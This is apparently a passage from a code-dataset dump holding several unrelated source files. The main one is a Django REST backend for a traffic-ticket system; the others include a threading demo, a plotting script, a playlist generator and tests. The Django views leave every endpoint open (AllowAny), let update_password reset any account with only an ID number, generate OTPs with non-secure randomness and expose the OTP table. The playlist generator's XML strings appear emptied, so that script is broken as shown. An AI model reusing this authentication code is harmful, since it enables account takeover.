VehicleOwner,\n Vehicle,\n Fine,\n ViolationType,\n Accident,\n Message,\n PoliceOfficer,\n Violation,\n Suggestion,\n Schedule,\n VehicleAccident,\n OTPVerification,\n CameraLocation,\n OfficerLocation\n)\nfrom api.serializers import (\n ViolationTypeSerializer,\n UserSerializer,\n AdminSerializer,\n PersonSerializer,\n DriverSerializer,\n VehicleOwnerSerializer,\n VehicleSerializer,\n FineSerializer,\n AccidentSerializer,\n MessageSerializer,\n PoliceOfficerSerializer,\n ViolationSerializer,\n FineWithViolationAmountSerializer,\n SuggestionSerializer,\n ScheduleSerializer,\n scheduledOfficersSerializer,\n 
DriverDetailsSerializer,\n OfficerDetailsSerializer,\n FineDetailsSerializer,\n AccidentDetailsSerializer,\n VehicleAccidentSerializer,\n OTPVerificationSerializer,\n RecentAccidentsSerializer,\n OfficerLocationSerializer,\n CameraLocationSerializer,\n PoliceStationLocationsSerializer,\n FineIdSerializer,\n VehicleDetailsSerializer,\n MyTokenObtainPairSerializer\n)\n\nfrom rest_framework import generics\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.db.models import Count\nfrom django.core.mail import send_mail\nfrom pyotp import TOTP\nimport random\nimport string\nfrom django.http import JsonResponse\nfrom datetime import datetime, timedelta\nfrom django.utils import timezone\nfrom django.db.models.functions import ExtractMonth, ExtractDay\nfrom datetime import date, timedelta\n\n\n# jwt token view\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n\n queryset = User.objects.all().order_by(\"-date_joined\")\n serializer_class = UserSerializer\n permission_classes = [permissions.AllowAny]\n\n # driver mobile driver signup\n @action(detail=False, methods=[\"post\"])\n def driver_signup(self, request):\n \"\"\"Register a new user.\n api [POST] /api/users/driver_signup/]\n required ['password', 'email', 'first_name', 'last_name', 'nic', 'license_id']]\"\"\"\n\n user = User.objects.create_user(\n username=request.data[\"nic\"],\n password=request.data[\"password\"],\n email=request.data[\"email\"],\n )\n group = Group.objects.get(name=\"driver\")\n user.groups.add(group)\n user.save()\n p, is_created = Person.objects.get_or_create(\n first_name=request.data[\"first_name\"],\n last_name=request.data[\"last_name\"],\n defaults={\"nic\": request.data[\"nic\"]},\n )\n driver = Driver.objects.create(\n nic=p,\n license_id=request.data[\"license_id\"],\n user=user,\n )\n driver.save()\n return Response({\"status\": \"driver created\"}, status=status.HTTP_201_CREATED)\n\n # driver/officer mobile change password\n @action(detail=False, methods=[\"put\"])\n def change_password(self, request):\n \"\"\"\n Change a user's password.\n api [POST] /api/users/change_password/\n required: ['nic', 'old_password', 'new_password']\n \"\"\"\n nic = request.data.get(\"nic\")\n old_password = request.data.get(\"old_password\")\n new_password = request.data.get(\"new_password\")\n\n if not nic or not old_password or not new_password:\n return Response(\n {\"error\": \"NIC, old password, and new password are required.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n try:\n user = User.objects.get(username=nic)\n except User.DoesNotExist:\n return Response(\n {\"error\": \"User not found.\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n if user.check_password(old_password):\n user.set_password(new_password)\n user.save()\n # Update the session to avoid having to re-login\n\n return Response({\"status\": \"password changed\"}, status=status.HTTP_200_OK)\n else:\n return Response(\n {\"error\": \"Old password is incorrect.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n # admin web officer signup\n @action(detail=False, methods=[\"post\"])\n def officer_signup(self, request):\n \"\"\"Register a new user.\n api [POST] /api/users/officer_signup/]\n required ['password', 'first_name', 'last_name', 'telephone','nic', 'police_station']]\"\"\"\n print(\"officer 
signup\")\n print(request.data)\n user = User.objects.create_user(\n username=request.data[\"officer_id\"],\n password=request.data[\"password\"],\n )\n group = Group.objects.get(name=\"officer\")\n user.groups.add(group)\n user.save()\n p, is_created = Person.objects.get_or_create(\n first_name=request.data[\"first_name\"],\n last_name=request.data[\"last_name\"],\n telephone=request.data[\"telephone\"],\n address=\"\",\n defaults={\"nic\": request.data[\"nic\"]},\n )\n officer = PoliceOfficer.objects.create(\n nic=p,\n police_station=request.data[\"police_station\"],\n officer_id=request.data[\"officer_id\"],\n user=user,\n )\n officer.save()\n return Response({\"status\": \"officer created\"}, status=status.HTTP_201_CREATED)\n\n # driver/officer mobile send otp\n @action(detail=False, methods=[\"post\"])\n def send_otp(self, request):\n \"\"\"\n Generate and send an OTP to the user's email.\n api [POST] /api/users/send_otp/\n required: ['nic']\n \"\"\"\n nic = request.data.get(\"nic\")\n\n try:\n user = User.objects.get(username=nic)\n\n except User.DoesNotExist:\n return Response({\"error\": \"User not found.\"}, status=status.HTTP_404_NOT_FOUND)\n\n # Check if an OTPVerification entry with the same `nic` already exists\n otp_verification, created = OTPVerification.objects.get_or_create(\n nic=nic)\n otp = ''.join(random.choices(string.digits, k=6))\n\n otp_verification.otp = otp\n otp_verification.save()\n\n totp = TOTP(otp)\n otp_url = totp.provisioning_uri(user.email, issuer_name=\"YourApp\")\n\n subject = \"OTP Verification\"\n message = f\"Your OTP for verification is: {otp}\"\n from_email = \"trafficticketse18@gmail.com\" # Update with your email\n recipient_list = [user.email]\n\n send_mail(subject, message, from_email,\n recipient_list, fail_silently=False)\n\n return Response({\"status\": \"OTP sent successfully.\"}, status=status.HTTP_200_OK)\n\n # driver/officer mobile verify otp\n @action(detail=False, methods=[\"post\"])\n def verify_otp(self, request):\n \"\"\"\n Verify the entered OTP.\n api [POST] /api/users/verify_otp/\n required: ['nic', 'entered_otp']\n \"\"\"\n nic = request.data.get(\"nic\")\n entered_otp = request.data.get(\"entered_otp\")\n\n try:\n user = User.objects.get(username=nic)\n except User.DoesNotExist:\n return Response({\"error\": \"User not found.\"}, status=status.HTTP_404_NOT_FOUND)\n\n try:\n otp_verification = OTPVerification.objects.get(nic=nic)\n except OTPVerification.DoesNotExist:\n return Response({\"error\": \"OTP not found for the user.\"}, status=status.HTTP_400_BAD_REQUEST)\n\n stored_otp = otp_verification.otp\n\n if (stored_otp == entered_otp):\n return Response({\"status\": \"OTP is valid.\"}, status=status.HTTP_200_OK)\n else:\n return Response({\"error\": \"Invalid OTP.\"}, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=[\"put\"])\n def update_password(self, request):\n \"\"\"\n Change a user's password.\n api [POST] /api/users/update_password/\n required: ['nic','new_password']\n \"\"\"\n nic = request.data.get(\"nic\")\n new_password = request.data.get(\"new_password\")\n\n if not nic or not new_password:\n return Response(\n {\"error\": \"NIC and new password are required.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n try:\n user = User.objects.get(username=nic)\n except User.DoesNotExist:\n return Response(\n {\"error\": \"User not found.\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n user.set_password(new_password)\n user.save()\n # Update the session to avoid having to re-login\n\n return 
Response({\"status\": \"password changed\"}, status=status.HTTP_200_OK)\n\n\nclass ViolationTypeViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows violation types to be viewed or edited.\n \"\"\"\n\n queryset = ViolationType.objects.all()\n serializer_class = ViolationTypeSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass AdminViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows admins to be viewed or edited.\n \"\"\"\n\n queryset = Admin.objects.all()\n serializer_class = AdminSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass PersonViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows persons to be viewed or edited.\n \"\"\"\n\n queryset = Person.objects.all()\n serializer_class = PersonSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass DriverViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows drivers to be viewed or edited.\n \"\"\"\n\n queryset = Driver.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"list\":\n return DriverDetailsSerializer\n return DriverSerializer\n\n\nclass VehicleOwnerViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows vehicle owners to be viewed or edited.\n \"\"\"\n\n queryset = VehicleOwner.objects.all()\n serializer_class = VehicleOwnerSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass VehicleViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows vehicles to be viewed or edited.\n \"\"\"\n\n queryset = Vehicle.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"retrieve\":\n return VehicleDetailsSerializer\n return VehicleSerializer\n\n\nclass FineViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows fines to be viewed or edited.\n \"\"\"\n\n queryset = Fine.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"list\":\n return FineDetailsSerializer\n return FineSerializer\n\n\nclass FineByIdViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows a fine to be viewed or edited.\n \"\"\"\n\n serializer_class = FineIdSerializer\n permission_classes = [permissions.AllowAny]\n\n def get_queryset(self):\n driver_id = self.kwargs['driver_id']\n driver = Driver.objects.get(nic=driver_id)\n queryset = Fine.objects.filter(driver=driver)\n return queryset\n\n\nclass AccidentViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows accidents to be viewed or edited.\n \"\"\"\n\n queryset = Accident.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"list\":\n return AccidentDetailsSerializer\n return AccidentSerializer\n\n # admin web recent accidents\n @action(detail=False, methods=[\"GET\"])\n def get_recent_accidents(self, request, *args, **kwargs):\n queryset = Accident.objects.all().order_by('-index')[:6]\n serializer = RecentAccidentsSerializer(queryset, many=True)\n return Response(serializer.data)\n\n # admin web monthly accident count\n @action(detail=False, methods=[\"GET\"])\n def get_monthly_count(self, request, *args, **kwargs):\n current_year = date.today().year\n queryset = Accident.objects.filter(date__year=current_year).annotate(month=ExtractMonth(\n 'date')).values('month').annotate(count=Count('index')).values('month', 'count')\n monthly_count = [0]*12\n for data in queryset:\n 
monthly_count[data['month']-1] = data['count']\n print(queryset)\n return Response(monthly_count)\n\n # admin web weekly accident count\n @action(detail=False, methods=[\"GET\"])\n def get_weekly_count(self, request, *args, **kwargs):\n today = date.today()\n weekday = today.weekday()\n start_of_week = today - timedelta(days=weekday)\n end_of_week = start_of_week + timedelta(days=6)\n queryset = Accident.objects.filter(date__range=[start_of_week, end_of_week]).annotate(\n day=ExtractDay('date')).values('day').annotate(count=Count('index')).values('day', 'count')\n weekly_count = [0]*7\n for data in queryset:\n weekly_count[data['day']-start_of_week.day] = data['count']\n return Response(weekly_count)\n\n # admin web reported accident count\n @action(detail=False, methods=[\"GET\"])\n def get_reported_accident_count(self, request, *args, **kwargs):\n today = date.today()\n queryset = Accident.objects.filter(date=today)\n return Response(queryset.count())\n\n\nclass MessageViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows messages to be viewed or edited.\n \"\"\"\n\n queryset = Message.objects.all()\n serializer_class = MessageSerializer\n permission_classes = [permissions.AllowAny]\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n # Create a list to hold the serialized data for each message\n data = []\n\n for message in queryset:\n # Get the sender's police officer information based on sender_nic\n try:\n sender_id = message.sender_nic\n police_officer = PoliceOfficer.objects.get(\n officer_id=sender_id)\n\n police_station = police_officer.police_station\n except PoliceOfficer.DoesNotExist:\n sender_id = None\n police_station = None\n\n # Create a dictionary for the current message\n message_data = {\n 'message_body': message.body,\n 'sender_id': sender_id,\n 'police_station': police_station,\n }\n\n data.append(message_data)\n\n return Response(data, status=status.HTTP_200_OK)\n\n\nclass PoliceOfficerViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows officers to be viewed or edited.\n \"\"\"\n\n queryset = PoliceOfficer.objects.all()\n permission_classes = [permissions.AllowAny]\n\n def get_serializer_class(self):\n if self.action == \"list\":\n return OfficerDetailsSerializer\n return PoliceOfficerSerializer\n\n\nclass ViolationViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows violations to be viewed or edited.\n \"\"\"\n\n queryset = Violation.objects.all()\n serializer_class = ViolationSerializer\n permission_classes = [permissions.AllowAny]\n\n# new\n\n\nclass SuggestionViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows suggestions to be viewed or edited.\n \"\"\"\n\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass ScheduleViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows schedules to be viewed or edited.\n \"\"\"\n\n queryset = Schedule.objects.all()\n serializer_class = ScheduleSerializer\n permission_classes = [permissions.AllowAny]\n\n # admin web create schedule\n @action(detail=False, methods=[\"post\"])\n def create_schedule(self, request):\n \"\"\"Create a new schedule.\n api [POST] /api/schedules/create_schedule/]\n required ['officer_id', 'location', 'shift', 'date']]\"\"\"\n print(\"create schedule\")\n print(request.data[\"date\"])\n\n try:\n officer = PoliceOfficer.objects.get(\n officer_id=request.data[\"officer_id\"])\n except:\n return Response(\n {\"error\": 
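get_monthly_count above turns a sparse month→count aggregation into a fixed 12-slot list by writing each row into monthly_count[month-1]. The reindexing pattern, isolated so the shape is obvious (plain dicts mimic the .values('month', 'count') rows):

# Densifying a sparse {month: count} aggregation into a 12-slot list, as the
# monthly-count endpoint does. Missing months stay zero.
rows = [{"month": 2, "count": 5}, {"month": 7, "count": 3}]

monthly_count = [0] * 12
for row in rows:
    monthly_count[row["month"] - 1] = row["count"]
print(monthly_count)
# [0, 5, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0]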
\"Officer not found.\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n schedule = Schedule.objects.create(\n officer=officer,\n location=request.data[\"location\"],\n shift=request.data[\"shift\"],\n date=request.data[\"date\"],\n police_station=request.data[\"police_station\"],\n )\n schedule.save()\n return Response({\"status\": \"schedule created\"}, status=status.HTTP_201_CREATED)\n\n # admin web get scheduled officers\n @action(detail=False, methods=[\"GET\"])\n def get_scheduled_officers(self, request, *args, **kwargs):\n date = request.GET.get('date')\n policeStation = request.GET.get('police_station')\n queryset = Schedule.objects.filter(\n date=date, police_station=policeStation)\n serializer = scheduledOfficersSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass VehicleAccidentViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows vehicle accidents to be viewed or edited.\n \"\"\"\n\n queryset = VehicleAccident.objects.all()\n serializer_class = VehicleAccidentSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass OfficerLocationViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows officer locations to be viewed or edited.\n \"\"\"\n\n queryset = OfficerLocation.objects.all()\n serializer_class = OfficerLocationSerializer\n permission_classes = [permissions.AllowAny]\n\n # admin web get locations related to police station\n @action(detail=False, methods=[\"GET\"])\n def get_police_station_locations(self, request, *args, **kwargs):\n police_station = request.GET.get('police_station')\n queryset = OfficerLocation.objects.filter(\n police_station=police_station)\n serializer = PoliceStationLocationsSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass CameraLocationViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows camera locations to be viewed or edited.\n \"\"\"\n\n queryset = CameraLocation.objects.all()\n serializer_class = CameraLocationSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass OTPVerificationViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n\n queryset = OTPVerification.objects.all()\n serializer_class = OTPVerificationSerializer\n permission_classes = [permissions.AllowAny]\n\n\nclass FineList(generics.ListAPIView):\n queryset = Fine.objects.all()\n serializer_class = FineWithViolationAmountSerializer\n\n def get_queryset(self):\n # Get the driver_id from the request query parameters\n driver_id = self.request.query_params.get('driver_id')\n\n # Check if driver_id is provided in the request\n if driver_id:\n # Filter the fines based on the provided driver_id\n queryset = Fine.objects.filter(driver__nic__nic=driver_id)\n else:\n # If driver_id is not provided, return an empty queryset\n queryset = Fine.objects.none()\n\n return queryset","repo_name":"NimeshRancha/TrafficTicketBackend-main","sub_path":"TrafficTicket/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23519808268","text":"import threading\nimport time\nclass shop:\n def __init__(self,name):\n self.__name=name\nclass user:\n def __init__(self,name):\n self.__name = name\nclass 秒杀(threading.Thread):\n count =20\n def __init__(self,user):\n super().__init__()\n\n def run(self):\n while 秒杀.count>0:\n mutex.acquire() #加锁\n if 秒杀.count>0:\n print('{}抢到了{}号商品'.format(self.name,秒杀.count))\n 
秒杀.count-=1\n time.sleep(0.01)\n mutex.release() #解锁\n #else:\n #print('抢没了')\n \n\nif __name__=='__main__':\n count=20\n mutex =threading.Lock()\n for i in range(15):\n p=秒杀(i)\n p.start()\n\n \n","repo_name":"zhaoshuo1988/learngit","sub_path":"多线程.py","file_name":"多线程.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11095015772","text":"from ts_limit.grid import Grid\nimport numpy as np\nimport sys\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom math import floor\nfrom matplotlib.colors import BoundaryNorm\nfrom matplotlib.ticker import MaxNLocator\nfrom os import listdir\nfrom os.path import isfile\nfrom matplotlib import rc\nimport sys\nimport re\n\n\ntry:\n which_roi = int(sys.argv[1])\nexcept IndexError:\n print('you should provide an argument')\n sys.exit()\ntry:\n H0 = np.loadtxt(f'../../roi_simulation/roi_files/roi_{which_roi}/loglike_H0.dat')\nexcept IOError:\n pass\n\ndirectory = f'roi_{which_roi}'\n\n\ndef check_files(directory, which_roi, prefix='out_', postfix='.dat'):\n '''Checks files in directory for completeness, i.e. if all data lines are present.\n TODO: Include check if all 900 files are present.\n Returns:\n data_set, dictionary with likes, missing lines and missing gm.\n '''\n file_list = listdir(directory)\n data_list = []\n for c, v in enumerate(file_list):\n if prefix in v and postfix in v and not 'copy' in v:\n data_list.append(f'{directory}/{v}')\n \n try:\n loglike_H0 = np.loadtxt(f'/nfs/astrop/n1/kuhlmann/NGC_1275/ts_limit/roi_simulation/roi_files/roi_{which_roi}/loglike_H0.dat')\n except IOError:\n pass\n numbers = np.zeros((900, 2), dtype=int)\n numbers[:, 0] = np.arange(0, 900, dtype=int)\n missing_lines = []\n likes = np.zeros((900)) # indices: files, simulation, value\n for n in numbers:\n # print(n)\n try:\n temp = np.loadtxt(f'{directory}/{prefix}{n[0]:03}{postfix}')\n if np.any(np.isclose(temp, np.zeros(temp.shape))):\n print(f\"{n[0]} has zeros!\")\n counter = 0\n for c, line in enumerate(temp):\n if np.any(np.isclose(line, np.zeros(line.shape))):\n missing_lines.append([n[0], c])\n counter += 1\n else:\n pass\n numbers[n[0], 1] = counter\n elif temp.shape[0] != 100 or temp.shape[1] != 3:\n raise IOError\n else:\n try:\n ts_fit = np.sort(2 * (temp[:, -1] - loglike_H0))\n except NameError:\n ts_fit = np.sort(2 * (temp[:, -1] - temp[:, 0]))\n likes[n[0]] = ts_fit[94]\n except IOError:\n print(f'file {n} is missing')\n missing_lines.append([n[0], 0])\n # missing_lines.append([n[0], 25])\n # missing_lines.append([n[0], 50])\n # missing_lines.append([n[0], 75]) \n missing_gm = []\n for line in missing_lines:\n arg = [line[0], which_roi, 0]\n if arg not in missing_gm:\n missing_gm.append(arg)\n np.savetxt(f'{directory}/missing_args.txt', np.array(missing_gm), fmt=\"%1.1i\")\n data_set = {'likes': likes, 'missing_lines': missing_lines, 'missing_gm': missing_gm}\n return data_set\n\n\ndef write_ts(likes, which_roi):\n try:\n ts = np.loadtxt('ts/ts.dat')\n ts = ts.reshape((int(ts.flatten().shape[0] / 2), 2))\n for line in ts:\n if which_roi == line[0]:\n break\n else:\n ts = np.append(ts, np.array([[which_roi, np.max(likes)]]), axis=0)\n \n except IOError:\n ts = np.array([[which_roi, np.max(likes)]])\n ts = ts.reshape(1, 2)\n np.savetxt('ts/ts.dat', ts, fmt=\"%1.1i %1.3f\")\n\n\ndef plot_data(likes, which_roi, local_save_dir, afs_save_dir):\n likes = likes.reshape(30, 30)\n fig = plt.figure(1, dpi=150)\n cmap = plt.get_cmap('seismic')\n 
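The flash-sale worker above acquires and releases its class-level Lock manually, which leaks the lock if anything raises between acquire() and release(). Lock supports the context-manager protocol, so `with mutex:` gives the same double-checked decrement with an exception-safe release; a standalone sketch:

# Exception-safe locking with `with`: the lock is released even if the body
# raises. Same double-checked-counter pattern as the flash-sale threads.
import threading

count = 20
mutex = threading.Lock()

def grab(name):
    global count
    while True:
        with mutex:                 # acquire + guaranteed release
            if count <= 0:
                return
            count -= 1
            print(f"{name} grabbed item {count + 1}")

threads = [threading.Thread(target=grab, args=(f"t{i}",)) for i in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print("left:", count)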
levels = MaxNLocator(nbins=cmap.N).tick_values(-40, 40)\n ax = fig.add_subplot(111)\n norm = BoundaryNorm(levels, cmap.N)\n x_helper = np.linspace(-1, 2, num=30, endpoint=True)\n dx_2 = (x_helper[1] - x_helper[0]) / 2\n x = np.logspace(-1 - dx_2, 2 + dx_2, num=31, endpoint=True, base=10.0)\n y = np.logspace(-1 - dx_2, 2 + dx_2, num=31, endpoint=True, base=10.0)\n g_space = np.logspace(-1. - dx_2, 2. - dx_2, num=30, base=10.0, endpoint=True) # in 1e-11 1/GeV\n m_space = np.logspace(-1. - dx_2, 2. - dx_2, num=30, base=10.0, endpoint=True) # in neV\n grid = np.zeros((g_space.shape[0], m_space.shape[0], 2))\n for i in range(g_space.shape[0]):\n for j in range(m_space.shape[0]):\n grid[i, j, :] = g_space[i], m_space[j]\n grid = grid.reshape((m_space.shape[0] * g_space.shape[0], 2))\n xmin, xmax, ymin, ymax = 0.3, 30.0, 0.3, 7.0\n pcol = ax.pcolor(x, y, likes, cmap=cmap, norm=norm, alpha=1)\n cb = fig.colorbar(pcol, ax=ax, extend='neither', ticks=(-40, -20, -10, -5, 0, 5, 10, 20, 40), \\\n label='TS')\n ticklabels = cb.ax.get_yticklabels()\n cb.ax.set_yticklabels(ticklabels, ha='right')\n cb.ax.yaxis.set_tick_params(pad=20)\n ax.set_xlim((np.power(10, -1 - dx_2), np.power(10, 2+dx_2)))\n ax.set_ylim((np.power(10, -1 - dx_2), np.power(10, 2+dx_2)))\n ax.set_xlabel('$m_{a}$ [neV]')\n ax.set_ylabel('$g_{a\\gamma\\gamma}$ [$10^{-11}$ GeV$^{-1}$]')\n ax.set_xticks([1e-1, 1e0, 1e1, 1e2])\n ax.set_xticklabels([r'$10^{-1}$', r'$10^{0}$', r'$10^{1}$', r'$10^{2}$'], ha='left')\n\n ax.set_yticks([1e-1, 1e0, 1e1, 1e2])\n ax.set_yticklabels([r'$10^{-1}$', r'$10^{0}$', r'$10^{1}$', r'$10^{2}$'], ha='left')\n ax.yaxis.set_tick_params(pad=20)\n ax.set_xscale('log')\n ax.set_yscale('log')\n fig.subplots_adjust(hspace=0)\n fig.patch.set_facecolor('white')\n fig.tight_layout(pad=2, h_pad=1.5, w_pad=2)\n fig.savefig(f'/afs/desy.de/user/k/kuhlmjul/NGC_1275/maps/ts_fixed_{which_roi}.png', dpi=150, bbox_inches='tight')\n fig.savefig(f'colormaps/ts_fixed_{which_roi}.png', dpi=150, bbox_inches='tight')\n# fig.savefig('test_fig.png')\n\n\ndata = check_files(f'roi_{which_roi}', which_roi)\nif data['missing_lines'] == []:\n plot_data(data['likes'], which_roi, f'colormaps/ts_fixed_{which_roi}.png', f'/afs/desy.de/user/k/kuhlmjul/NGC_1275/maps/ts_fixed_{which_roi}.png')\n write_ts(data['likes'], which_roi)\nelse:\n pass\n","repo_name":"specktakel/ts_limit","sub_path":"grid_ts/outdata/loglike.py","file_name":"loglike.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18039309782","text":"import argparse\nimport pathlib\nfrom . 
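plot_data above builds pcolor cell boundaries by padding half a log-step (the dx_2 offsets) on each side of the 30 log-spaced centres, because pcolor wants N+1 edges for N cells. That centre→edge construction in isolation:

# Building N+1 logarithmic bin edges around N log-spaced centres, as the
# colormap code does with its dx_2 half-step. Each centre then sits at the
# geometric mean of its two edges.
import numpy as np

n = 30
exps = np.linspace(-1, 2, n)          # exponents of the centres
half = (exps[1] - exps[0]) / 2
centers = 10.0 ** exps
edges = 10.0 ** np.linspace(-1 - half, 2 + half, n + 1)

assert edges.shape[0] == centers.shape[0] + 1
assert np.allclose(np.sqrt(edges[:-1] * edges[1:]), centers)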
import rspec_compile_sources\n\n\ndef parse_args(args=None):\n parser = argparse.ArgumentParser()\n parser.add_argument('dir', nargs='+')\n parser.add_argument('--destination')\n args = parser.parse_args(args)\n return args, parser\n\n\ndef open_dir(source):\n path = pathlib.Path(source)\n if not path.exists():\n raise ValueError('dir does not exist')\n if not path.is_dir():\n raise ValueError('dir is not a dir')\n return path\n\n\nif __name__ == '__main__':\n args, parser = parse_args()\n sources = [open_dir(source) for source in args.dir]\n destination = open_dir(args.destination)\n rspec_compile_sources(sources, destination)\n","repo_name":"ClassHeroes/specs-compiler","sub_path":"swag/rspec/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"19482008065","text":"def print_hi(name):\n print(f'Hi, {name}')\n# system of equations\n\ndef modify_list(l):\n le = len(l) - 1\n i = le\n while i != -1:\n if l[i] % 2:\n del l[i]\n else:\n l[i] = l[i] // 2\n i -= 1\n return\n\nif __name__ == '__main__':\n print_hi('PyCharm')","repo_name":"komyelizqa/education-proj","sub_path":"function_list.py","file_name":"function_list.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"28023621550","text":"'''\n\tTest Playlist Generator v1.02\n\t\n\tDescription: Used to create a test playlist file for VS\n\tAuthor: Jordan Munch O'Hare\n\tDate: 25-07-2019\n\t\n\tOptional Arguments:\n\t\t1: Filename to read\n\t\t2: Location to save file\n'''\n\nimport time\nimport sys\nfrom pathlib import Path\n\nnameOfFileToParse = \"\"\nlocationToSaveFile = \"\"\nargs = sys.argv[1:]\n#print(args)\n\ndef Argument1FileName():\n\tglobal nameOfFileToParse\n\tnameOfFileToParse = args[0]\n\tif nameOfFileToParse.find('.') == -1:\n\t\tprint('Filename error, did you forget the filetype \".txt\"?')\n\t\texit()\n\n\nif len(args) == 0:\n\tnameOfFileToParse = \"tests.txt\"\nelif len(args) == 1:\n\tArgument1FileName()\nelif len(args) == 2:\n\tArgument1FileName()\n\tlocationToSaveFile = args[1]\nelse:\n\tprint(\"Too many arguments\")\n\texit()\n\n\noutFileName = nameOfFileToParse[:nameOfFileToParse.index('.')] + '-' + time.strftime(\"%Y-%m-%d\") + '.playlist'\ninputFileName = nameOfFileToParse\ntestCount = 0\n\n# Check for input file\nif(not Path(inputFileName).is_file()):\n\tprint(\"No input file found. 
Please create '\" + inputFileName + \"' with your desired tests on each line.\")\n\texit()\n\n# Open files, creating the output file if it does not exist\nfileIn = open(inputFileName)\nfileOut = open(locationToSaveFile + outFileName, 'w+')\n\n##################\n\nfileOut.write('\\n')\n\nfor line in fileIn:\n\tif line.strip():\n\t\t#print(line.rstrip())\t\n\t\tfileOut.write('\\t\\n')\n\t\ttestCount += 1\n\nfileOut.write('')\n\nfileIn.close()\nfileOut.close()\n\nprint('Generated ' + locationToSaveFile + outFileName + ' with ' + str(testCount) + ' tests')","repo_name":"ohare93/Python-Mini-Projects","sub_path":"TestPlaylistGenerator/TestPlaylistGenerator.py","file_name":"TestPlaylistGenerator.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26574230631","text":"from contextlib import suppress\nfrom pathlib import Path\nfrom unittest.mock import MagicMock, patch, sentinel\n\nfrom evenless_api import dependencies\nfrom evenless_api.settings import Settings\n\n\n@patch(\n \"evenless_api.dependencies.Settings\", side_effect=[sentinel.first, sentinel.second]\n)\ndef test_get_settings_cached(_) -> None:\n # given\n dependencies.get_settings.cache_clear()\n\n # when\n dependencies.get_settings()\n settings = dependencies.get_settings()\n\n # then\n assert settings is sentinel.first\n\n\n@patch(\"notmuch.Database\")\ndef test_get_db(mock_db) -> None:\n # given\n path = \"db/path\"\n settings = Settings(notmuch_db_path=path)\n\n # when\n gen = dependencies.get_db(settings=settings)\n next(gen)\n with suppress(StopIteration):\n next(gen)\n\n # then\n mock_db.assert_called_once_with(path)\n mock_db.return_value.__enter__.assert_called_once()\n mock_db.return_value.__exit__.assert_called_once()\n\n\n@patch(\"evenless_api.dependencies.message_from_file\")\ndef test_get_message_body(mock) -> None:\n # given\n inner = dependencies.get_message_body()\n mock_path = MagicMock(spec=Path)\n body = \"This is an email body.\"\n mock.return_value.get_body.return_value.get_payload.return_value = body\n\n # when\n result = inner(mock_path)\n\n # then\n mock_path.open.assert_called_once()\n assert result == body\n","repo_name":"phha/evenless_api","sub_path":"tests/unit_tests/test_dependencies.py","file_name":"test_dependencies.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7704840965","text":"from django.db import models\nfrom django.utils import timezone\nfrom 